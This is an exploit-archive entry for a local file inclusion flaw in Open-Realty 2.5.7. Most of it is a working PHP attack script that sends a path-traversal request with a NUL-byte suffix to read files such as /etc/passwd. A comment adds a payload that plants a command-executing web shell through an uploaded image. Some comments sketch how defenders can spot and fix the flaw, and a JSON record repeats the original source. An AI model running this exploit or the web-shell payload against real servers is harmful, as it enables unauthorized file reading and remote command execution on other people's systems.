ID 1337DAY-ID-13741
Type zdt
Reporter Nikola Petrov
Modified 2010-08-18T00:00:00
Description
Exploit for php platform in category web applications
=====================================================
Open-Realty 2.5.7 Local File Disclosure Vulnerability
=====================================================
<?php
/*
* Exploit Title:
* Date: 2010-08-18
* Author: Nikola Petrov
* Vendor: http://open-realty.org/
* Version: 2.5.7
*/
/*
vulnerable: Open-Realty 2.5.7
LFI: /index.php
upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>
include the image and sh.php will be generated.
proceed with sh.php
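Preconditions: MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
The %00 truncation relies on an old runtime: PHP 5.3.4 and later reject file paths
that contain a NUL byte, so the include fails there regardless of the MAGIC_QUOTES setting.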
*/
// Banner shown on every run: author credit and the date the author gives for the finding.
echo "\n\n#########################################################################\n",
     "#LFI discovery and implementation: Nikola Petrov ([email protected])\n",
     "#Date: 05.09.2009\n",
     "#########################################################################\n\n";

// Four positional arguments are mandatory; the usage text lists a fifth (debug) as optional.
if ($argc < 5) {
    echo "usage: $argv[0] host port path file [debug: 1/0]\n",
         "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
    exit();
}

// argv[1..4]: server host, TCP port, request path, and the relative file path
// that is later placed in the request body. None of them is validated here.
list(, $Host, $Port, $Path, $File) = $argv;
/**
 * Sends one raw request over a plain TCP socket and returns the peer's full reply.
 *
 * The reply is read in 1024-byte chunks until feof() reports end of stream, so the
 * call returns only once the peer has closed the connection. On a failed connect
 * the function prints an error and terminates the script instead of returning.
 *
 * @param string $aHost   Host name or address passed to fsockopen().
 * @param mixed  $aPort   TCP port passed to fsockopen().
 * @param string $aPacket Bytes written to the socket as-is.
 * @return string Everything read from the socket (headers and body, unparsed).
 */
function HttpSend($aHost, $aPort, $aPacket) {
    $Conn = fsockopen($aHost, $aPort);
    if (!$Conn) {
        echo "Error connecting to $aHost:$aPort\n\n";
        exit();
    }

    fwrite($Conn, $aPacket);

    // Collect the chunks first and join them once the stream is exhausted.
    $Chunks = array();
    while (!feof($Conn)) {
        $Chunks[] = fread($Conn, 1024);
    }
    fclose($Conn);

    return implode("", $Chunks);
}
// Form body: the select_users_lang parameter carries the caller-supplied relative
// path followed by a URL-encoded NUL byte (%00).
// Defender's view: a POST to the application's index.php whose select_users_lang
// value contains "../" sequences or "%00" is the observable signature of this request
// in web-server and WAF logs. The server-side code is not shown on this page;
// presumably the parameter reaches an include path, so the fix belongs there:
// accept only values from a fixed list of installed language names.
$VulnRequest = "select_users_lang=" . $File . "%00";

// Raw HTTP/1.1 request assembled by hand. Content-Length counts only $VulnRequest;
// the "\n" appended after the body is sent beyond the declared length.
$Packet = "POST {$Path} HTTP/1.1\r\n"
        . "Host: {$Host}\r\n"
        . "Content-Type: application/x-www-form-urlencoded\r\n"
        . "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n"
        . "$VulnRequest\n";

// NOTE(review): $argv[5] is read without checking that the optional debug argument
// was given, so a four-argument run triggers an undefined-offset notice/warning here.
if ($argv[5] == 1) {
    echo $Packet;
}

// The server's unparsed reply (status line, headers, body) goes straight to stdout.
echo HttpSend($Host, $Port, $Packet);
?>
{"id": "1337DAY-ID-13741", "lastseen": "2018-02-10T11:18:15", "viewCount": 103, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-10T11:18:15", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-10T11:18:15", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/13741", "description": "Exploit for php platform in category web applications", "title": "Open-Realty 2.5.7 Local File Disclosure Vulnerability", "cvelist": [], "sourceData": "=====================================================\r\nOpen-Realty 2.5.7 Local File Disclosure Vulnerability\r\n=====================================================\r\n\r\n<?php\r\n/*\r\n * Exploit Title:\r\n * Date: 2010-08-18\r\n * Author: Nikola Petrov\r\n * Vendor: http://open-realty.org/\r\n * Version: 2.5.7\r\n */\r\n /*\r\n vulnerable: Open-Realty 2.5.7\r\n LFI: /index.php\r\n \r\n upload image with: <?php system(\"echo \\\"<?php if(isset(\\$_GET[\\\"cmd\\\"])) system(\\$_GET[\\\"cmd\\\"]); ?>\\\" > sh.php\"); ?>\r\n include the image and sh.php will be generated.\r\n proceed with sh.php\r\n \r\n MAGIC_QUOTES must be 'off' and %00 must not be replaced with \\0.\r\n */\r\n \r\n print \"\\n\\n#########################################################################\\n\";\r\n print \"#LFI discovery and implementation: Nikola Petrov ([email\u00a0protected])\\n\";\r\n print \"#Date: 05.09.2009\\n\";\r\n print \"#########################################################################\\n\\n\";\r\n \r\n if($argc < 5) {\r\n print \"usage: $argv[0] host port path file [debug: 1/0]\\n\";\r\n print \"example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\\n\\n\\n\";\r\n exit();\r\n }\r\n \r\n $Host = $argv[1];\r\n $Port = $argv[2];\r\n $Path = $argv[3];\r\n $File = $argv[4];\r\n \r\n function HttpSend($aHost, $aPort, $aPacket) {\r\n $Response = 
\"\";\r\n \r\n if(!$Socket = fsockopen($aHost, $aPort)) {\r\n print \"Error connecting to $aHost:$aPort\\n\\n\";\r\n exit();\r\n }\r\n \r\n fputs($Socket, $aPacket);\r\n \r\n while(!feof($Socket)) $Response .= fread($Socket, 1024);\r\n \r\n fclose($Socket);\r\n \r\n return $Response;\r\n }\r\n \r\n $VulnRequest = \"select_users_lang=\". $File . \"%00\";\r\n \r\n $Packet = \"POST {$Path} HTTP/1.1\\r\\n\";\r\n $Packet .= \"Host: {$Host}\\r\\n\";\r\n $Packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $Packet .= \"Content-Length: \" . strlen($VulnRequest) . \"\\r\\n\\r\\n\";\r\n $Packet .= \"$VulnRequest\\n\";\r\n \r\n if($argv[5] == 1) print $Packet;\r\n \r\n print HttpSend($Host, $Port, $Packet);\r\n?>\r\n\r\n\n\n# 0day.today [2018-02-10] #", "published": "2010-08-18T00:00:00", "references": [], "reporter": "Nikola Petrov", "modified": "2010-08-18T00:00:00", "href": "https://0day.today/exploit/description/13741", "immutableFields": []}
{}